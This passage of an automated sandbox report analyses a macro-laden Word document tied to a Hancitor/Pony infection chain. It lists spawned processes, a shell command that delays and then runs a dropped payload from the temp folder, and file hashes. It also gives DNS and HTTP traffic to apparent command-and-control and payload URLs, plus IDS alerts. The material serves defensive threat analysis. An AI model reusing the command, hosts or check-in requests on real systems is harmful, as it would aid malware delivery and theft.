    "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
    "\Sessions\1\BaseNamedObjects\Local\MU_IMDS10_S-1-5-5-0-61684"
    "\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
    "\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208"
    "\Sessions\1\BaseNamedObjects\DBWinMutex"
    "\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
    "\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
    "\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
    "\Sessions\1\BaseNamedObjects\RasPbFile"
  - source: Created Mutant
  - relevance: 3/10
- Loads rich edit control libraries
  - details: "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 62EB0000
  - source: Loaded Module
  - ATT&CK ID: T1179
- Process launched with changed environment
  - details:
    Process "cmd.exe" was launched with new environment variables: "WecVersionForRosebud.CC8="4""
    Process "extra_embedded_0.exe" was launched with new environment variables: "PROMPT="$P$G", MpConfig_ProductUserAppDataPath="C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows Defender", LOGONSERVER="\\PSPUBWS-PC", HOMEPATH="\Users\PSPUBWS", MpConfig_ProductAppDataPath="%ALLUSERSPROFILE%\Microsoft\Windows Defender", MpConfig_ProductPath="%PROGRAMFILES%\Windows Defender", HOMEDRIVE="C:", MpConfig_ProductCodeName="AntiSpyware", MpConfig_ReportingGUID="D9765A22-4A32-46A9-92CB-043F61DC4FA2""
    Process "extra_embedded_0.exe" was launched with modified environment variables: "LOCALAPPDATA, TMP, USERDOMAIN, USERNAME, USERPROFILE, TEMP, APPDATA"
  - source: Monitored Target
  - relevance: 10/10
- Runs shell commands
  - details: "/c ping localhost -n 100 && %TEMP%\6.pif" on 2018-12-10.19:30:01.181
  - source: Monitored Target
  - relevance: 5/10
- Scanning for window names
  - details:
    "WINWORD.EXE" searching for class "mspim_wnd32"
    "WINWORD.EXE" searching for class "MSOBALLOON"
    "WINWORD.EXE" searching for class "MsoHelp10"
    "WINWORD.EXE" searching for class "AgentAnim"
  - source: API Call
  - relevance: 10/10
  - ATT&CK ID: T1010
- Spawns new processes
  - details:
    Spawned process "cmd.exe" with commandline "/c ping localhost -n 100 && %TEMP%\6.pif"
    Spawned process "PING.EXE" with commandline "ping localhost -n 100"
  - source: Monitored Target
  - relevance: 3/10
Installation/Persistance
-
Dropped files
- details
-
"2018-12-10-downloaded-Word-doc-with-macro-for-emotet.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Tue Dec 11 03:27:30 2018 mtime=Tue Dec 11 03:27:30 2018 atime=Tue Dec 11 03:28:01 2018 length=324576 window=hide"
"~_18-12-10-downloaded-Word-doc-with-macro-for-emotet.doc" has type "data"
"MSForms.exd" has type "data"
"index.dat" has type "data"
"A7F9A125.emf" has type "Windows Enhanced Metafile (EMF) image data version 0x10000"
"BA7EECE2.png" has type "PNG image data 950 x 600 8-bit/color RGBA non-interlaced"
"~WRS_6BF65F21-8CCE-47B9-B3B8-A985AF752E4B_.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"~WRD0000.tmp" has type "Microsoft Word 2007+"
"~WRS_B4352521-F5F3-4AE1-8E53-57687BE403FC_.tmp" has type "data"
"~_Normal.dotm" has type "data"
- source
- Binary File
- relevance
- 3/10
-
Opens the MountPointManager (often used to detect additional infection locations)
- details
- "WINWORD.EXE" opened "\Device\MountPointManager"
- source
- API Call
- relevance
- 5/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "C:\Windows\AppPatch\sysmain.sdb"
"WINWORD.EXE" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\StaticCache.dat"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\user32.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6BF65F21-8CCE-47B9-B3B8-A985AF752E4B}.tmp"
"WINWORD.EXE" touched file "C:\Windows\System32\en-US\msctf.dll.mui"
- source
- API Call
- relevance
- 7/10
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "api.ipify.org"
Heuristic match: "henmerecrob.com"
Heuristic match: "itssprout.com"
Heuristic match: "apathtoinnerpeace.com"
Heuristic match: "hk3fitness.com"
Heuristic match: "sycamoreelitefitness.com"
Pattern match: "xK.kt/S9z.0F7,\5_cjc"
Pattern match: "oUF.gd/Q/$$JzO]wc2Ns"
Heuristic match: "kg&7SLHM_*K1q{6E5Y-b[EV.al"
- source
- File/Memory
- relevance
- 10/10
File Details
2018-12-10-downloaded-Word-doc-with-macro-for-emotet.doc
- Filename
- 2018-12-10-downloaded-Word-doc-with-macro-for-emotet.doc
- Size
- 317KiB (324576 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Architecture
- WINDOWS
- SHA256
- 2827845a9c77b29d5d4362365107dae1accb79dc89947446ad83c12421b45621
- MD5
- 64dd6dc51c359fe9d14e7775a6291b92
- SHA1
- 37b9815194ed7c2cf1278d0fcea707592f660aa3
- ssdeep
- 6144:tfconHXx2Y+NZ9yModcFBvZppZvLe1Pxz1dSUTqiNf276r2ZCj7vmWEcGO:VnHXM7eaFRvi1pbSUTqiNf2GrFj+O
Classification (TrID)
- 59.4% (.DOCM) Word Microsoft Office Open XML Format document (with Macro)
- 36.0% (.DOCX) Word Microsoft Office Open XML Format document
- 4.5% (.ZIP) ZIP compressed archive
Hybrid Analysis
Analysed 4 processes in total.
- WINWORD.EXE /n "C:\2018-12-10-downloaded-Word-doc-with-macro-for-emotet.doc" (PID: 3272)
- extra_embedded_0.exe (PID: 2768) 15/69
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
apathtoinnerpeace.com | 192.185.226.114 (TTL: 3600) | - | United States |
api.ipify.org | 54.204.36.156 (TTL: 300) | eNom, Inc.; Name Server: NS1.DNSIMPLE.COM; Creation Date: Sun, 05 Jan 2014 22:02:15 GMT | United States |
henmerecrob.com | 185.244.149.11 (TTL: 3600) | CNOBIN INFORMATION TECHNOLOGY LIMITED | Netherlands |
hk3fitness.com | 192.232.223.6 (TTL: 3600) | Network Solutions, LLC; Name Server: NS6173.HOSTGATOR.COM; Creation Date: Wed, 12 Feb 2014 16:30:28 GMT | United States |
itssprout.com | 192.232.216.139 (TTL: 3600) | GoDaddy.com, LLC; Name Server: NS315.HOSTGATOR.COM; Creation Date: Mon, 28 May 2012 17:15:47 GMT | United States |
sycamoreelitefitness.com | 209.188.93.46 (TTL: 3600) | DREAMHOST; Organization: Proxy Protection LLC; Name Server: NS1.ASTUTEWEBGROUP.COM; Creation Date: Tue, 05 Jun 2012 21:50:39 GMT | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
54.204.36.156 | 80 TCP | extra_embedded_0.exe PID: 2768 | United States |
185.244.149.11 | 80 TCP | extra_embedded_0.exe PID: 2768 | Netherlands |
192.232.216.139 | 80 TCP | extra_embedded_0.exe PID: 2768 | United States |
192.185.226.114 | 80 TCP | extra_embedded_0.exe PID: 2768 | United States |
192.232.223.6 | 80 TCP | extra_embedded_0.exe PID: 2768 | United States |
209.188.93.46 | 80 TCP | extra_embedded_0.exe PID: 2768 | United States |
HTTP Traffic
Endpoint | Request | URL | Request line and headers |
---|---|---|---|
54.204.36.156:80 (api.ipify.org) | GET | api.ipify.org/ | GET / HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: api.ipify.org<br>Cache-Control: no-cache |
185.244.149.11:80 (henmerecrob.com) | POST | henmerecrob.com/4/forum.php | POST /4/forum.php HTTP/1.1<br>Accept: */*<br>Content-Type: application/x-www-form-urlencoded<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: henmerecrob.com<br>Content-Length: 112<br>Cache-Control: no-cache |
192.232.216.139:80 (itssprout.com) | GET | itssprout.com/wp-includes/1 | GET /wp-includes/1 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: itssprout.com<br>Cache-Control: no-cache |
192.232.216.139:80 (itssprout.com) | GET | itssprout.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: itssprout.com<br>Cache-Control: no-cache<br>Connection: Keep-Alive |
192.185.226.114:80 (apathtoinnerpeace.com) | GET | apathtoinnerpeace.com/wp-content/themes/twentyfourteen/1 | GET /wp-content/themes/twentyfourteen/1 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: apathtoinnerpeace.com<br>Cache-Control: no-cache |
192.185.226.114:80 (apathtoinnerpeace.com) | GET | apathtoinnerpeace.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: apathtoinnerpeace.com<br>Cache-Control: no-cache<br>Connection: Keep-Alive |
192.232.223.6:80 (hk3fitness.com) | GET | hk3fitness.com/wp-includes/customize/1 | GET /wp-includes/customize/1 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: hk3fitness.com<br>Cache-Control: no-cache |
192.232.223.6:80 (hk3fitness.com) | GET | hk3fitness.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: hk3fitness.com<br>Cache-Control: no-cache<br>Connection: Keep-Alive |
209.188.93.46:80 (sycamoreelitefitness.com) | GET | sycamoreelitefitness.com/modules/DesignManager/1 | GET /modules/DesignManager/1 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: sycamoreelitefitness.com<br>Cache-Control: no-cache |
185.244.149.11:80 (henmerecrob.com) | POST | henmerecrob.com/mlu/forum.php | POST /mlu/forum.php HTTP/1.0<br>Host: henmerecrob.com<br>Accept: */*<br>Accept-Encoding: identity, *;q=0<br>Accept-Language: en-US<br>Content-Length: 206<br>Content-Type: application/octet-stream<br>Connection: close<br>Content-Encoding: binary<br>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
192.232.216.139:80 (itssprout.com) | GET | itssprout.com/wp-includes/2 | GET /wp-includes/2 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: itssprout.com<br>Cache-Control: no-cache |
192.232.216.139:80 (itssprout.com) | GET | itssprout.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: itssprout.com<br>Cache-Control: no-cache<br>Connection: Keep-Alive |
192.185.226.114:80 (apathtoinnerpeace.com) | GET | apathtoinnerpeace.com/wp-content/themes/twentyfourteen/2 | GET /wp-content/themes/twentyfourteen/2 HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: apathtoinnerpeace.com<br>Cache-Control: no-cache |
192.185.226.114:80 (apathtoinnerpeace.com) | GET | apathtoinnerpeace.com/cgi-sys/suspendedpage.cgi | GET /cgi-sys/suspendedpage.cgi HTTP/1.1<br>Accept: */*<br>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko<br>Host: apathtoinnerpeace.com<br>Cache-Control: no-cache<br>Connection: Keep-Alive |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 54.204.36.156:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY External IP Lookup api.ipify.org | 2021997 |
local -> 185.244.149.11:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin | 2819978 |
local -> 185.244.149.11:80 (TCP) | A Network Trojan was detected | CrowdStrike Hancitor POST Request | 181610701 |
local -> 185.244.149.11:80 (TCP) | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 2 | 2014411 |
local -> 185.244.149.11:80 (TCP) | A Network Trojan was detected | CrowdStrike Pony Request | 181708101 |
209.188.93.46 -> local:52295 (TCP) | A Network Trojan was detected | ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) | 2824549 |
Extracted Files
-
Malicious 1
-
extra_embedded_0.exe.bin
- Size
- 75KiB (76800 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "DangerousObject.Multi" (15/69)
- MD5
- 5758a38fca8a35c2dfb63481c6bde4ad
- SHA1
- fb6712e25ddcc04f8b5bfd3fcf022cfadd2da9c3
- SHA256
- e60ffcbb61eb448085a0375a2ec8f23fdd48198e1a7bc73090320bb4b7705e6e
-
Informative 10
-
2018-12-10-downloaded-Word-doc-with-macro-for-emotet.LNK
- Size
- 673B (673 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 11 03:27:30 2018, mtime=Tue Dec 11 03:27:30 2018, atime=Tue Dec 11 03:28:01 2018, length=324576, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- 6c6d06a87d1bd664de469a63804bd08f
- SHA1
- a6986461a43587f6ecbef43dc6331b230f663c0c
- SHA256
- c7b7e1adc1829b87e03f57afa32aabad3033860d907e70e48338f66de6fba69d
-
index.dat
- Size
- 233B (233 bytes)
- Type
- data
- Runtime Process
- extra_embedded_0.exe (PID: 2768)
- MD5
- e26194adef3ada42b93c53d46a9540d2
- SHA1
- c565b55b456aab1cb6d935d5b4c6d88339407736
- SHA256
- 15c4b3345f5ee8627c31a06a27a2908c34262c3e0a47b78f97a969d9b79e9c79
-
A7F9A125.emf
- Size
- 4.9KiB (4968 bytes)
- Type
- img image
- Description
- Windows Enhanced Metafile (EMF) image data version 0x10000
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- 02d606b97d25842ebd7c77caa2f47a96
- SHA1
- d265e94763ceff1ea35ac3c5b9873a442470ea0b
- SHA256
- 99ffc3e38f497690400bf0ba49e5fbdae47c0c866c3445e36d92f64def416bd1
-
BA7EECE2.png
- Size
- 222KiB (227238 bytes)
- Type
- img image
- Description
- PNG image data, 950 x 600, 8-bit/color RGBA, non-interlaced
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- e004606e9d7fdd1d04ce54255f2a3e73
- SHA1
- 11df333085689323bf5e151b535fc2fc328b9d97
- SHA256
- 995951d7df3942aa31febf3f17c2b9ca47782e857417c4037704502b2233345b
-
MSForms.exd
- Size
- 163KiB (166724 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- 58e01714de768542bbdf5947e00713eb
- SHA1
- cd4dadebd748cc3c67951f11cb3911ae991421cc
- SHA256
- fe963884a60b51c0c476868653d2304a68bffd4583dc4800bf92d85391d87ed1
-
~WRD0000.tmp
- Size
- 512KiB (524288 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Runtime Process
- WINWORD.EXE (PID: 3272)
- MD5
- 79cf96a5d8ede734211a02e91dffc7e8
- SHA1
- d0020cabb41a5ce32662583e4b7ac37532a592a3
- SHA256
- 19287b620c567b599a6ac70ba62bfc877b5bf07c0e429e4b17ce70e9a5e1fbcc
-
~_18-12-10-downloaded-Word-doc-with-macro-for-emotet.doc
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 532dc65a706e0cb04b63587484135941
- SHA1
- ee8da634664c9994ca9d8dd270d4c31e7bc7318a
- SHA256
- d23175ae1db73ebb04dd96cab66c8bf6ea56dff3b0963685cfcbe48c67cc246f
-
~WRS_6BF65F21-8CCE-47B9-B3B8-A985AF752E4B_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~WRS_B4352521-F5F3-4AE1-8E53-57687BE403FC_.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- MD5
- 8a5cac75c8c090a0f24bdbfa1486a68a
- SHA1
- 822432d9b7284f186052f1d1f9eeacb4f9f16883
- SHA256
- bcde324c8d16948a2383a59c5bfd06cde4cd9b6033e2386c28b38852fc41d5c4
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- MD5
- 532dc65a706e0cb04b63587484135941
- SHA1
- ee8da634664c9994ca9d8dd270d4c31e7bc7318a
- SHA256
- d23175ae1db73ebb04dd96cab66c8bf6ea56dff3b0963685cfcbe48c67cc246f
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Not all file accesses are visible for PING.EXE (PID: 1748)
- Not all file accesses are visible for cmd.exe (PID: 2928)
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report